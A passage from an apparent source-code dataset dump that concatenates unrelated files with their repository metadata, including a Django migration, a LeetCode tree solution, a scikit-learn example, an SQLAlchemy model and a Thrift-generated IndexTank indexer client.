filename=phd_output_dir+"ch7_table_gen_all_xtype_cluster",
caption="Cluster Datum Pairs by Type (All Cases).",
alignment='r ' * len(header_row))
pair_table_data.append(
("\midrule Total cluster datum pairs",
sum(count for count in inter_cross_types_matrix.values())
+ sum(count for count in cross_types_matrix.values())))
# Generate Overview Stats Table
# ====
# In[13]:
t = matrix2latex.matrix2latex(table_data, filename=phd_output_dir+"ch5_table_gen_gt_summary", caption="Summary of participants' ground truth data.", alignment='r r')
print(t)
# In[14]:
t = matrix2latex.matrix2latex(pair_table_data,
filename=phd_output_dir+'ch7_table_pair_summary',
caption='Summary of Ground Truth Datum Pairs.',
alignment='r r')
print(t)
| [
"blamey.ben@gmail.com"
] | blamey.ben@gmail.com |
4e807ffc55a08ee93c326f17f8af5422fe962403 | e940d45bb3af60d90371ea3721a93d892778be8e | /setup.py | 06f1a0b76ed3c6c47986cf191ddecabc0510aab7 | [] | no_license | jmartens/fail2map | 0905191a4b8fc6a22ace59c72a02b0a2d88f123a | 8c9e6f04e39a3cc138dc88168d65d3bfecb8a836 | refs/heads/master | 2022-12-05T03:39:20.035771 | 2022-11-19T09:35:30 | 2022-11-19T09:35:30 | 204,539,431 | 0 | 1 | null | 2022-11-19T09:35:31 | 2019-08-26T18:46:01 | Python | UTF-8 | Python | false | false | 290 | py | from setuptools import setup, find_packages
setup(
name='fail2map',
version='0.1',
packages=find_packages(),
include_package_data=True,
install_requires=[
'Click',
],
entry_points='''
[console_scripts]
fail2map=scripts.cli:cli
''',
) | [
"jonathan@snetram.nl"
] | jonathan@snetram.nl |
7e51c318ad5eaadbc941369304e8d88bd41bbca3 | 30556827b68e9241c6e4045668158809b4bc9670 | /medicar/specialties/migrations/0001_initial.py | 8f85efdd77d63e62c2e25494e5e76253ed34fd0c | [] | no_license | gabrielloliveira/medicar | 434ea47a5ebde2e797522ffd3b86b67c46de96f5 | 4b6e7d38d2ad569d1ca087a4a7f6e2c1ee0feedf | refs/heads/main | 2023-08-25T03:50:35.035474 | 2021-09-16T21:54:47 | 2021-09-16T21:54:47 | 406,541,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 980 | py | # Generated by Django 3.2.7 on 2021-09-14 23:42
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Specialty',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Criado em')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='Atualizado em')),
('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True, verbose_name='UUID')),
('name', models.CharField(max_length=255, verbose_name='nome')),
],
options={
'verbose_name': 'Especialidade',
'verbose_name_plural': 'Especialidades',
},
),
]
| [
"gabrielloliveira097@gmail.com"
] | gabrielloliveira097@gmail.com |
a13a4d56104bd687f7c9c1b4efa6c7b4fb4ee4e4 | 2020c9c6958d9cc338b72f62e24d9ad30c1a8cad | /python/0101.symmetric-tree/symmetric-tree.py | 8cf51e4680551dbd6d293ddb24a39ee7fa4c43f7 | [] | no_license | ysmintor/leetcode | b2d87db932b77e72504ffa07d7bf1b0d8c09b661 | 434889037fe3e405a8cbc71cd822eb1bda9aa606 | refs/heads/master | 2020-05-30T21:03:03.886279 | 2019-10-31T08:46:23 | 2019-10-31T09:02:24 | 189,963,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | class Solution:
"""
recursive solution
"""
def isSymmetric(self, root: TreeNode) -> bool:
if root == None:
return True
return self.isMirror(root.left, root.right)
def isMirror(self, t1: TreeNode, t2:TreeNode ) -> bool:
if t1 == None and t2 == None:
return True
if t1 == None or t2 == None:
return False
return (t1.val == t2.val) \
and self.isMirror(t1.right, t2.left) \
and self.isMirror(t1.left, t2.right)
| [
"ysmintor@gmail.com"
] | ysmintor@gmail.com |
f86011e920527fade4c0b894ea3f406f6ca86766 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /10_Imbalanced_Classification_with_Python/13/03_balanced_decision_tree.py | 723ce924b4ed4330ac7a194e25defea465a60bfa | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 823 | py | # decision tree with class weight on an imbalanced classification dataset
from numpy import mean
from sklearn.datasets import make_classification
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeClassifier
# generate dataset
X, y = make_classification(n_samples=10000, n_features=2, n_redundant=0, n_clusters_per_class=1, weights=[0.99],
flip_y=0, random_state=3)
# define model
model = DecisionTreeClassifier(class_weight='balanced')
# define evaluation procedure
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
# evaluate model
scores = cross_val_score(model, X, y, scoring='roc_auc', cv=cv, n_jobs=-1)
# summarize performance
print('Mean ROC AUC: %.3f' % mean(scores))
| [
"jgrimes@jgrimes.tech"
] | jgrimes@jgrimes.tech |
7c847d5608c0383cb74ad877bd64cbdd8ac68671 | 5b8893290c0688d9db512865f2b124355eccc06e | /news_recommendation_service/click_log_processor_test.py | 9b5e5f205d2d69549274ea03c38ca3db2ee10cce | [] | no_license | aaronmarveller/News-Secretary- | 52dddeb729ddff91b4f4f79741f3412c2ab96ae8 | 5ab079976a5545bc1a965bb81d195ac6dfb7e0b2 | refs/heads/master | 2022-12-14T22:24:15.119183 | 2019-12-02T19:05:55 | 2019-12-02T19:05:55 | 211,028,401 | 0 | 0 | null | 2022-11-21T21:39:06 | 2019-09-26T07:33:32 | Jupyter Notebook | UTF-8 | Python | false | false | 911 | py | import click_log_processor
import os
import sys
from datetime import datetime
# import common package in parent directory
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import mongodb_client
PREFERENCE_MODEL_TABLE_NAME = "user_preference_model"
NEWS_TABLE_NAME = "news"
NUM_OF_CLASSES = 8
# Start MongoDB before running following tests.
def test_basic():
db = mongodb_client.get_db()
db[PREFERENCE_MODEL_TABLE_NAME].delete_many({"userId": "test_user"})
msg = {"userId": "test_user",
"newsId": "n0GWi/32LzHUyxG8IRggWg==\n",
"timestamp": str(datetime.utcnow())}
click_log_processor.handle_message(msg)
model = db[PREFERENCE_MODEL_TABLE_NAME].find_one({'userId':'test_user'})
assert model is not None
assert len(model['preference']) == NUM_OF_CLASSES
print('test_basic passed!')
if __name__ == "__main__":
test_basic() | [
"peiyuanl@usc.edu"
] | peiyuanl@usc.edu |
68bfd4e76590f1df88be225c2f0c12f57e6d3a86 | 6b42fdcd2f61eaee2d80cd1372233b5cc5c66f0c | /Caption's_shield(turtle).py | ff92820f0defb182ae5be3f345e2c210df8e056b | [] | no_license | Anaa29/Python-codes | 984ba797c0f308d57d4a2fd40c08db1d402d55e8 | af7e7af85f59e7a527892039def395c1b9cce7ec | refs/heads/main | 2023-08-06T06:07:17.586635 | 2021-10-11T14:05:44 | 2021-10-11T14:05:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | from turtle import *
bgcolor("white")
pencolor("red")
hideturtle()
speed(0)
penup()
goto(0,-200)
pendown()
pensize(5)
circle(240)
penup()
goto(0,-160)
pendown()
circle(200)
penup()
goto(0,-120)
pendown()
circle(160)
penup()
goto(0,-80)
pendown()
circle(120)
penup()
goto(0,40)
pendown()
pencolor("blue")
for i in range(220): #for star
forward(i)
right(144)
| [
"noreply@github.com"
] | noreply@github.com |
6aec32137b0b9097f9eb10fc15dc24b304330007 | 8b0c8d30fb6182b564f516127ebd4bccd7b4e97d | /flasky/models/hold.py | d2e5ea7cbc3e9cbae9beebea0d61a1953c941cde | [] | no_license | rthoward/flasky | fbac5d5f68580135aa0893514a6ee48ad0a49e63 | 20a61df2f4f9ecbfea5988e8984a08bdb1e37742 | refs/heads/master | 2020-05-26T17:53:27.657831 | 2019-06-02T02:53:39 | 2019-06-02T02:53:39 | 188,326,987 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,008 | py | import typing
from sqlalchemy import String, Column, Integer, ForeignKey, UniqueConstraint, TIMESTAMP
from sqlalchemy.orm import relationship
from . import Base
from .mixins import TimestampsMixin
if typing.TYPE_CHECKING:
from .event import Event
from .user import User
class Hold(Base, TimestampsMixin): # type: ignore
__tablename__ = "holds"
id = Column(Integer, primary_key=True)
quantity = Column(Integer, nullable=False)
ends_at = Column(TIMESTAMP(timezone=False), nullable=True, index=True)
user_id = Column(Integer, ForeignKey("users.id"), nullable=False)
user = relationship("User", back_populates="holds")
event_id = Column(Integer, ForeignKey("events.id"), nullable=False, index=True)
event = relationship("Event", back_populates="holds")
__table_args__ = (UniqueConstraint("user_id", "event_id"),)
def __repr__(self):
return "<Hold id={} event_name={} qty={}>".format(
self.id, self.event.name, self.quantity
)
| [
"richard@howard.io"
] | richard@howard.io |
30dea1db000cc40ea6b735e332cf15c6d2f4bace | 6413fe58b04ac2a7efe1e56050ad42d0e688adc6 | /tempenv/lib/python3.7/site-packages/plotly/graph_objs/layout/ternary/aaxis/__init__.py | 797a36fb417fb76496384beb1c5bdf6c09acee6b | [
"MIT"
] | permissive | tytechortz/Denver_temperature | 7f91e0ac649f9584147d59193568f6ec7efe3a77 | 9d9ea31cd7ec003e8431dcbb10a3320be272996d | refs/heads/master | 2022-12-09T06:22:14.963463 | 2019-10-09T16:30:52 | 2019-10-09T16:30:52 | 170,581,559 | 1 | 0 | MIT | 2022-06-21T23:04:21 | 2019-02-13T21:22:53 | Python | UTF-8 | Python | false | false | 159 | py | from ._title import Title
from plotly.graph_objs.layout.ternary.aaxis import title
from ._tickformatstop import Tickformatstop
from ._tickfont import Tickfont
| [
"jmswank7@gmail.com"
] | jmswank7@gmail.com |
11b41900468b82ef7940e02e889324872ea46a3f | f44a1cbb48952ce466310859234f73cb2769ef2c | /backend/mobile_5_oct_1723/wsgi.py | b09e1b28f4e63a9fbc6f3a96c61672bb2582051a | [] | no_license | crowdbotics-apps/mobile-5-oct-1723 | ea496e71e634a67dccfb39019dd50d9351247943 | 94ddd875afaa86d5810d24644a35e23db6b231d1 | refs/heads/master | 2022-12-25T10:00:21.575101 | 2020-10-05T05:14:39 | 2020-10-05T05:14:39 | 301,300,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for mobile_5_oct_1723 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobile_5_oct_1723.settings')
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
d459bddbd0f3aa4b8e20ce26a6a7fd7c6bba651b | f393e818e1e7043fe6612717355e3d4aa60e4b20 | /3.3.py | 2b6f9fe07943843e09ff55d78daa445e57d51dfb | [] | no_license | janejh/PY4E | f76ea87eb87f31c1b9fb3d302ceae57785c7d702 | 7cf9d3e42e7579777a9f031d00486ae47e215234 | refs/heads/master | 2020-04-04T23:17:22.477365 | 2018-11-26T04:51:19 | 2018-11-26T04:51:19 | 156,353,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | #3.3 Write a program to prompt for a score between 0.0 and 1.0. If the score is out of range, print an error. If the score is between 0.0 and 1.0, print a grade using the following table:
#Score Grade
#>= 0.9 A
#>= 0.8 B
#>= 0.7 C
#>= 0.6 D
#< 0.6 F
#If the user enters a value out of range, print a suitable error message and exit. For the test, enter a score of 0.85.
score = input("Enter Score: ")
try:
s = float(score)
except:
print("Error, please enter a valid score.")
if s > 1.0 :
print("error")
if s < 0.0 :
print("error")
elif s >= 0.9:
print("A")
elif s >= 0.8:
print("B")
elif s >= 0.7:
print("C")
elif s >= 0.6:
print("D")
else :
print("F")
| [
"noreply@github.com"
] | noreply@github.com |
03094c11f0802ec69b127a4e182849ed912ba923 | 8284ad49884e5f47ecb3f673846d616997adec61 | /gen-py/flaptor/indextank/rpc/Indexer.py | a3eda578cf644eb152204f88775f3a4e3af5d8e2 | [
"Apache-2.0"
] | permissive | kemitche/indextank-service | aa0a5f556ed3a2ac248bbb85182893354143d919 | 80c47e52520ad0c8c988c35e23ce62696e327266 | refs/heads/master | 2021-01-15T21:02:35.420570 | 2012-01-03T13:27:03 | 2012-01-03T13:27:03 | 3,103,835 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 83,755 | py | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from thrift.Thrift import *
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def addDoc(self, docid, doc, timestamp_boost, boosts):
"""
Parameters:
- docid
- doc
- timestamp_boost
- boosts
"""
pass
def updateTimestampBoost(self, docid, timestamp_boost):
"""
Parameters:
- docid
- timestamp_boost
"""
pass
def updateBoost(self, docid, boosts):
"""
Parameters:
- docid
- boosts
"""
pass
def updateCategories(self, docid, categories):
"""
Parameters:
- docid
- categories
"""
pass
def delDoc(self, docid):
"""
Parameters:
- docid
"""
pass
def promoteResult(self, docid, query):
"""
Parameters:
- docid
- query
"""
pass
def dump(self, ):
pass
def addScoreFunction(self, functionIndex, definition):
"""
Parameters:
- functionIndex
- definition
"""
pass
def removeScoreFunction(self, functionIndex):
"""
Parameters:
- functionIndex
"""
pass
def listScoreFunctions(self, ):
pass
def stats(self, ):
pass
def get_stats(self, ):
pass
def force_gc(self, ):
pass
def getStatus(self, ):
pass
def ping(self, ):
pass
def startFullRecovery(self, ):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def addDoc(self, docid, doc, timestamp_boost, boosts):
"""
Parameters:
- docid
- doc
- timestamp_boost
- boosts
"""
self.send_addDoc(docid, doc, timestamp_boost, boosts)
self.recv_addDoc()
def send_addDoc(self, docid, doc, timestamp_boost, boosts):
self._oprot.writeMessageBegin('addDoc', TMessageType.CALL, self._seqid)
args = addDoc_args()
args.docid = docid
args.doc = doc
args.timestamp_boost = timestamp_boost
args.boosts = boosts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_addDoc(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = addDoc_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def updateTimestampBoost(self, docid, timestamp_boost):
"""
Parameters:
- docid
- timestamp_boost
"""
self.send_updateTimestampBoost(docid, timestamp_boost)
self.recv_updateTimestampBoost()
def send_updateTimestampBoost(self, docid, timestamp_boost):
self._oprot.writeMessageBegin('updateTimestampBoost', TMessageType.CALL, self._seqid)
args = updateTimestampBoost_args()
args.docid = docid
args.timestamp_boost = timestamp_boost
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_updateTimestampBoost(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = updateTimestampBoost_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def updateBoost(self, docid, boosts):
"""
Parameters:
- docid
- boosts
"""
self.send_updateBoost(docid, boosts)
self.recv_updateBoost()
def send_updateBoost(self, docid, boosts):
self._oprot.writeMessageBegin('updateBoost', TMessageType.CALL, self._seqid)
args = updateBoost_args()
args.docid = docid
args.boosts = boosts
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_updateBoost(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = updateBoost_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def updateCategories(self, docid, categories):
"""
Parameters:
- docid
- categories
"""
self.send_updateCategories(docid, categories)
self.recv_updateCategories()
def send_updateCategories(self, docid, categories):
self._oprot.writeMessageBegin('updateCategories', TMessageType.CALL, self._seqid)
args = updateCategories_args()
args.docid = docid
args.categories = categories
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_updateCategories(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = updateCategories_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def delDoc(self, docid):
"""
Parameters:
- docid
"""
self.send_delDoc(docid)
self.recv_delDoc()
def send_delDoc(self, docid):
self._oprot.writeMessageBegin('delDoc', TMessageType.CALL, self._seqid)
args = delDoc_args()
args.docid = docid
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_delDoc(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = delDoc_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def promoteResult(self, docid, query):
"""
Parameters:
- docid
- query
"""
self.send_promoteResult(docid, query)
self.recv_promoteResult()
def send_promoteResult(self, docid, query):
self._oprot.writeMessageBegin('promoteResult', TMessageType.CALL, self._seqid)
args = promoteResult_args()
args.docid = docid
args.query = query
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_promoteResult(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = promoteResult_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def dump(self, ):
self.send_dump()
self.recv_dump()
def send_dump(self, ):
self._oprot.writeMessageBegin('dump', TMessageType.CALL, self._seqid)
args = dump_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_dump(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = dump_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def addScoreFunction(self, functionIndex, definition):
"""
Parameters:
- functionIndex
- definition
"""
self.send_addScoreFunction(functionIndex, definition)
self.recv_addScoreFunction()
def send_addScoreFunction(self, functionIndex, definition):
self._oprot.writeMessageBegin('addScoreFunction', TMessageType.CALL, self._seqid)
args = addScoreFunction_args()
args.functionIndex = functionIndex
args.definition = definition
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_addScoreFunction(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = addScoreFunction_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def removeScoreFunction(self, functionIndex):
"""
Parameters:
- functionIndex
"""
self.send_removeScoreFunction(functionIndex)
self.recv_removeScoreFunction()
def send_removeScoreFunction(self, functionIndex):
self._oprot.writeMessageBegin('removeScoreFunction', TMessageType.CALL, self._seqid)
args = removeScoreFunction_args()
args.functionIndex = functionIndex
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_removeScoreFunction(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = removeScoreFunction_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def listScoreFunctions(self, ):
self.send_listScoreFunctions()
return self.recv_listScoreFunctions()
def send_listScoreFunctions(self, ):
self._oprot.writeMessageBegin('listScoreFunctions', TMessageType.CALL, self._seqid)
args = listScoreFunctions_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_listScoreFunctions(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = listScoreFunctions_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.ite != None:
raise result.ite
raise TApplicationException(TApplicationException.MISSING_RESULT, "listScoreFunctions failed: unknown result");
def stats(self, ):
self.send_stats()
return self.recv_stats()
def send_stats(self, ):
self._oprot.writeMessageBegin('stats', TMessageType.CALL, self._seqid)
args = stats_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_stats(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = stats_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.ite != None:
raise result.ite
raise TApplicationException(TApplicationException.MISSING_RESULT, "stats failed: unknown result");
def get_stats(self, ):
self.send_get_stats()
return self.recv_get_stats()
def send_get_stats(self, ):
self._oprot.writeMessageBegin('get_stats', TMessageType.CALL, self._seqid)
args = get_stats_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_stats(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_stats_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.ite != None:
raise result.ite
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_stats failed: unknown result");
def force_gc(self, ):
self.send_force_gc()
self.recv_force_gc()
def send_force_gc(self, ):
self._oprot.writeMessageBegin('force_gc', TMessageType.CALL, self._seqid)
args = force_gc_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_force_gc(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = force_gc_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.ite != None:
raise result.ite
return
def getStatus(self, ):
self.send_getStatus()
return self.recv_getStatus()
def send_getStatus(self, ):
self._oprot.writeMessageBegin('getStatus', TMessageType.CALL, self._seqid)
args = getStatus_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getStatus(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = getStatus_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getStatus failed: unknown result");
def ping(self, ):
self.send_ping()
self.recv_ping()
def send_ping(self, ):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def startFullRecovery(self, ):
self.send_startFullRecovery()
self.recv_startFullRecovery()
def send_startFullRecovery(self, ):
self._oprot.writeMessageBegin('startFullRecovery', TMessageType.CALL, self._seqid)
args = startFullRecovery_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_startFullRecovery(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = startFullRecovery_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["addDoc"] = Processor.process_addDoc
self._processMap["updateTimestampBoost"] = Processor.process_updateTimestampBoost
self._processMap["updateBoost"] = Processor.process_updateBoost
self._processMap["updateCategories"] = Processor.process_updateCategories
self._processMap["delDoc"] = Processor.process_delDoc
self._processMap["promoteResult"] = Processor.process_promoteResult
self._processMap["dump"] = Processor.process_dump
self._processMap["addScoreFunction"] = Processor.process_addScoreFunction
self._processMap["removeScoreFunction"] = Processor.process_removeScoreFunction
self._processMap["listScoreFunctions"] = Processor.process_listScoreFunctions
self._processMap["stats"] = Processor.process_stats
self._processMap["get_stats"] = Processor.process_get_stats
self._processMap["force_gc"] = Processor.process_force_gc
self._processMap["getStatus"] = Processor.process_getStatus
self._processMap["ping"] = Processor.process_ping
self._processMap["startFullRecovery"] = Processor.process_startFullRecovery
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_addDoc(self, seqid, iprot, oprot):
args = addDoc_args()
args.read(iprot)
iprot.readMessageEnd()
result = addDoc_result()
try:
self._handler.addDoc(args.docid, args.doc, args.timestamp_boost, args.boosts)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("addDoc", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_updateTimestampBoost(self, seqid, iprot, oprot):
args = updateTimestampBoost_args()
args.read(iprot)
iprot.readMessageEnd()
result = updateTimestampBoost_result()
try:
self._handler.updateTimestampBoost(args.docid, args.timestamp_boost)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("updateTimestampBoost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_updateBoost(self, seqid, iprot, oprot):
args = updateBoost_args()
args.read(iprot)
iprot.readMessageEnd()
result = updateBoost_result()
try:
self._handler.updateBoost(args.docid, args.boosts)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("updateBoost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_updateCategories(self, seqid, iprot, oprot):
args = updateCategories_args()
args.read(iprot)
iprot.readMessageEnd()
result = updateCategories_result()
try:
self._handler.updateCategories(args.docid, args.categories)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("updateCategories", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_delDoc(self, seqid, iprot, oprot):
args = delDoc_args()
args.read(iprot)
iprot.readMessageEnd()
result = delDoc_result()
try:
self._handler.delDoc(args.docid)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("delDoc", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_promoteResult(self, seqid, iprot, oprot):
args = promoteResult_args()
args.read(iprot)
iprot.readMessageEnd()
result = promoteResult_result()
try:
self._handler.promoteResult(args.docid, args.query)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("promoteResult", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_dump(self, seqid, iprot, oprot):
args = dump_args()
args.read(iprot)
iprot.readMessageEnd()
result = dump_result()
try:
self._handler.dump()
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("dump", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_addScoreFunction(self, seqid, iprot, oprot):
args = addScoreFunction_args()
args.read(iprot)
iprot.readMessageEnd()
result = addScoreFunction_result()
try:
self._handler.addScoreFunction(args.functionIndex, args.definition)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("addScoreFunction", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_removeScoreFunction(self, seqid, iprot, oprot):
args = removeScoreFunction_args()
args.read(iprot)
iprot.readMessageEnd()
result = removeScoreFunction_result()
try:
self._handler.removeScoreFunction(args.functionIndex)
except IndextankException, ite:
result.ite = ite
oprot.writeMessageBegin("removeScoreFunction", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_listScoreFunctions(self, seqid, iprot, oprot):
args = listScoreFunctions_args()
args.read(iprot)
iprot.readMessageEnd()
result = listScoreFunctions_result()
try:
result.success = self._handler.listScoreFunctions()
except IndextankException, ite:
